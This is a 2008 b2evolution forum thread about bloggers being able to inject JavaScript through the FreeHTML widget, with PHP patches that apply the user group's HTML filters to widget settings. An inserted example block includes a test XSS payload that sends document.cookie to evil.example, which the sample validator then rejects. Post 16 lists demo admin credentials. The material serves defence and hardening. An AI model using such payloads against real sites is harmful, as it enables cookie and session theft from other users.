1 adiguba Jun 17, 2008 16:45
3 adiguba Jun 18, 2008 09:37
EdB wrote:
Sorry, but YOU gave them permission to do that right?
I only gave them the permission to use a blog and to publish posts.
Except with FreeHTML, there is no way for a blog's owner to directly put javascript on the blog...
bye
4 yabba Jun 18, 2008 10:54
Crack open the free html widget and add this to the bottom of the code ( before the final } ):
    // Override set() so every widget setting is validated against the
    // HTML filters of the current user's group before it is stored
    function set( $var, $value )
    {
        check_html_sanity( $value );    // records an error if the group's filters reject $value
        parent::set( $var, $value );    // having errors stops dbupdate()
    }
Note : if any illegal markup is found the contents of the widget are emptied
¥
*edit*
Code improvement, widget value isn't emptied on errors
5 edb Jun 18, 2008 17:14
adiGuba wrote:
EdB wrote:
Sorry, but YOU gave them permission to do that right?
I only gave them the permission to use a blog and to publish posts.
Except with FreeHTML, there is no way for a blog's owner to directly put javascript on the blog...
bye
Nope, sorry, not totally accurate. You absolutely MUST give them permission to affect blog settings before someone can even see that there is a "widgets" tab to play with.
A brand new user in the default configuration of the "bloggers" group can not add, edit, or delete a widget. The permissions for this particular group allow only posting private or draft. More importantly, this group has nothing checked for "Edit blog settings". When I check the box for "Edit blog settings -> Feat." the user in this group is able to access the "widgets" subtab and (of course) use the widgets.
This is not a bug. This is not a security problem. This is something that YOU can choose to give bloggers, or not.
6 adiguba Jun 18, 2008 18:11
¥åßßå : Thanks for the code. I will try it ;)
EdB : affect blog settings is different from allowing javascript.
I want "bloggers" to be allowed to post or edit blog settings, but not to directly put javascript...
7 yabba Jun 18, 2008 19:00
The problem is that even if you ban javascript for every group, no matter what access levels they have, if they have the ability to play with widgets then they can enter javascript into any widget settings that allow html.
Buggered if I can think of a foolproof solution ( for all widgets ) ..... maybe I need more beer?
¥
8 adiguba Jun 18, 2008 20:19
¥åßßå : your code is OK :D
I've looked more precisely at the code, and I think i found a foolproof solution ( for all widgets )
In the file inc/plugins/_plugin.funcs.php, the function autoform_validate_param_value() already checks data depending on the type.
Just add the following code in the switch($meta['type']) :
    case 'html_input':
    case 'html_textarea':
        // HTML-typed plugin/widget params go through the group's HTML filters
        check_html_sanity( $value );
        break;
So all HTML fields from plugins/widgets will use the security filters defined on the user's group.
I think it should be included as standard...
bye
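The two fixes in this thread (yabba's set() override in post 4 and the autoform_validate_param_value() cases in post 8) combined into one self-contained model, added here as an example; it is not code from the thread or from b2evolution. Every name in it (example_check_html_sanity, example_validate_param_value, ExampleWidget, the prevent_* group flags, the sample widget contents) is an assumption chosen for illustration, and the real check_html_sanity() and autoform_validate_param_value() signatures and filter rules are not reproduced.

```php
<?php
// Added example, not b2evolution code: models running every HTML-typed
// widget/plugin setting through the user group's HTML filters before storing
// it. All names and group flags below are assumptions for illustration.

// Constructed group settings, modelled on the "Prevent ..." checkboxes of a
// user group. true means the group is NOT allowed that feature.
$bloggers_group = array(
    'prevent_javascript' => true,
    'prevent_iframes'    => true,
    'prevent_objects'    => true,
    'prevent_css_tweaks' => true,
);

/**
 * Simplified stand-in for check_html_sanity(): returns the list of violations
 * found in $html under $group's filters; an empty array means clean.
 * Regexes are enough to show the idea; a production filter must parse the
 * HTML (entity decoding, attribute tokenising) instead of pattern-matching.
 */
function example_check_html_sanity( $html, array $group )
{
    $checks = array(
        'prevent_javascript' => array(
            '/<\s*script\b/i'                            => '<script> tag',
            '/\son[a-z]+\s*=/i'                          => 'on* event handler attribute',
            '/\b(href|src)\s*=\s*["\']?\s*javascript:/i' => 'javascript: URL',
        ),
        'prevent_iframes'    => array( '/<\s*i?frame\b/i' => '<iframe>/<frame> tag' ),
        'prevent_objects'    => array( '/<\s*(object|embed|applet)\b/i' => 'embedded object' ),
        'prevent_css_tweaks' => array(
            '/<\s*style\b/i' => '<style> tag',
            '/\sstyle\s*=/i' => 'style attribute',
        ),
    );
    $errors = array();
    foreach( $checks as $flag => $patterns )
    {
        if( empty( $group[$flag] ) )
        {   // the group is allowed this feature, so its patterns do not apply
            continue;
        }
        foreach( $patterns as $regex => $label )
        {
            if( preg_match( $regex, $html ) )
            {
                $errors[] = $flag.': found '.$label;
            }
        }
    }
    return $errors;
}

/**
 * Mirrors the autoform_validate_param_value() change from post 8: only
 * parameters declared as HTML types are checked, so text and integer
 * settings are untouched and existing widgets keep working.
 */
function example_validate_param_value( array $meta, $value, array $group )
{
    switch( $meta['type'] )
    {
        case 'html_input':
        case 'html_textarea':
            return example_check_html_sanity( $value, $group );
        default:
            return array();
    }
}

/**
 * Mirrors the set() override from post 4, generalised to any widget whose
 * parameter definitions declare a type: a rejected value leaves the stored
 * setting unchanged instead of emptying the widget.
 */
class ExampleWidget
{
    public $param_defs = array( 'content' => array( 'type' => 'html_textarea' ),
                                'title'   => array( 'type' => 'text' ) );
    public $params = array();
    public $errors = array();

    function set( $var, $value, array $group )
    {
        $meta = isset( $this->param_defs[$var] ) ? $this->param_defs[$var] : array( 'type' => 'text' );
        $this->errors = example_validate_param_value( $meta, $value, $group );
        if( count( $this->errors ) )
        {
            return false;   // keep the previous value and let the form show the errors
        }
        $this->params[$var] = $value;
        return true;
    }
}

// Constructed inputs: harmless markup first, then what a blogger with widget
// access could paste into a FreeHTML widget to steal other users' cookies.
$widget = new ExampleWidget();
$widget->set( 'content', '<p>Welcome to <b>my</b> blog</p>', $bloggers_group );
$ok = $widget->set( 'content', '<img src=x onerror="location=\'http://evil.example/?c=\'+document.cookie">', $bloggers_group );
echo $ok ? "stored\n" : 'rejected: '.implode( '; ', $widget->errors )."\n";
echo 'stored content is still: '.$widget->params['content']."\n";
// Caveat: a text-typed setting is never filtered, so it must be escaped on output.
$widget->set( 'title', '<script>alert(1)</script>', $bloggers_group );
echo 'title accepted unfiltered: '.$widget->params['title']."\n";
```

Run it with php on the command line: the second set() call is rejected with "prevent_javascript: found on* event handler attribute" and the first, clean value survives. Rejecting rather than silently stripping was chosen so the blogger sees why the save failed, and the last two lines show the limit of the approach: settings that are not declared as HTML types bypass the filter entirely, so whatever renders them (a widget title in a sidebar, for instance) must still HTML-escape the value.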
9 yabba Jun 18, 2008 21:20
Yeah, I'd thought of inc/widgets/model/_widget.class.php function set() ... I can see it generating bugs though, just not sure if I'm "over thinking" ;)
¥
10 padresol Jul 29, 2008 19:32
...javascript is allowed in html so preventing javascript would mean changing the widget to be not freeHTML but limitedHTML or ltdHTML. Anyway ...you get my point. I like the freeHTML plugin.
disclaimer: I don't fully understand the security/user-levels model yet so take what I say with that in mind. (^:
Could the widget only appear if you're at the highest user-level?
Like I say above if you restrict content and freeHTML becomes some sub-set of what's allowed in HTML (as defined by the HTML specification) then it's a completely different widget. But I guess it doesn't allow php so it's already a sub-set anyway.
I like the freeHTML widget and I use it for javascript.
I guess there might be a better way for me to insert the javascript?
11 adiguba Jul 29, 2008 20:29
Using check_html_sanity() on the FreeHTML widget doesn't totally forbid JavaScript. It simply uses the security filters defined on the user group:
- Prevent CSS tweaks WARNING: if allowed, users can easily deface the site, add hidden text, etc.
- Prevent iframes WARNING: if allowed, users may do XSS hacks, steal passwords from other users, etc.
- Prevent javascript WARNING: if allowed, users can easily do XSS hacks, steal passwords from other users, etc.
- Prevent objects WARNING: if allowed, users can spread viruses and malware through this blog.
Bye
12 yabba Jul 29, 2008 22:25
PadreSol wrote:
But I guess it doesn't allow php so it's already a sub-set anyway.
PHP is not part of the HTML specification, so not allowing PHP doesn't make it a sub-set ;)
¥
13 padresol Jul 29, 2008 22:44
¥åßßå wrote:
PadreSol wrote:
But I guess it doesn't allow php so it's already a sub-set anyway.
PHP is not part of the HTML specification, so not allowing PHP doesn't make it a sub-set ;)
¥
Ok, maybe I shouldn't have said specification. I guess I meant since php is embedded in HTML, commonly, then the freeHTML doesn't allow everything that is commonly allowed in HTML.
While we're kind of on the topic... is there a doc that describes what each user-level allows? I have looked and I still have yet to figure that out.
For example at what level can a user upload files so that they can use a photoblog?
Can widgets be configured to only be allowed at a certain level? Or does widget access become available at one-level and then all levels greater-than?
14 padresol Jul 29, 2008 22:45
adiGuba wrote:
Using check_html_sanity() on the FreeHTML widget doesn't totally forbid JavaScript. It simply uses the security filters defined on the user group:
- Prevent CSS tweaks WARNING: if allowed, users can easily deface the site, add hidden text, etc.
- Prevent iframes WARNING: if allowed, users may do XSS hacks, steal passwords from other users, etc.
- Prevent javascript WARNING: if allowed, users can easily do XSS hacks, steal passwords from other users, etc.
- Prevent objects WARNING: if allowed, users can spread viruses and malware through this blog.
Bye
It's still not clear to me, are these configurable per content-type? I'm new to all this.
15 yabba Jul 30, 2008 00:50
PadreSol wrote:
I guess I meant since php is embedded in HTML, commonly, then the freeHTML doesn't allow everything that is commonly allowed in HTML.
Try using php on a server that only allows html ;)
PadreSol wrote:
For example at what level can a user upload files so that they can use a photoblog?
From experience, users need to be level 2 to play with files
PadreSol wrote:
Can widgets be configured to only be allowed at a certain level? Or does widget access become available at one-level and then all levels greater-than?
All or nothing I'm afraid, if a user has access to ( blog settings I *think* ) then they have access to widget settings, if they don't then they don't
¥
16 adiguba Jul 30, 2008 00:52
PadreSol wrote:
It's still not clear to me, are these configurable per content-type? I'm new to all this.
This is configurable on the "user's group" page
Example on the demo : http://demo1.b2evolution.net/stable/admin.php?ctrl=users&grp_ID=4
(login: admin ; password: demopass)
=> So admin can decide who can use JavaScript and who cannot use it !
bye
17 edb Jul 30, 2008 00:56
User level is used very rarely. Someone can upload files if you give them the permission to upload files. The types of files that can be uploaded are also up to you, but not on a per-blogger basis.
Widgets are available to bloggers based on permission to access blog settings, and as far as I know widgets are generally not "level sensitive".
The different options for html checking stuff are set for each user group. The users tab, click the group name to change them.
18 padresol Jul 31, 2008 05:13
¥åßßå wrote:
Try using php on a server that only allows html ;)
Yah but we're talking about a php-based blog.
Thanks for the help on the user-levels.
Not a bug.
Sorry, but YOU gave them permission to do that right? Recognize that b2evolution does not give a blog to someone or give them permissions to do anything with any blog. YOU do that, so you own what happens.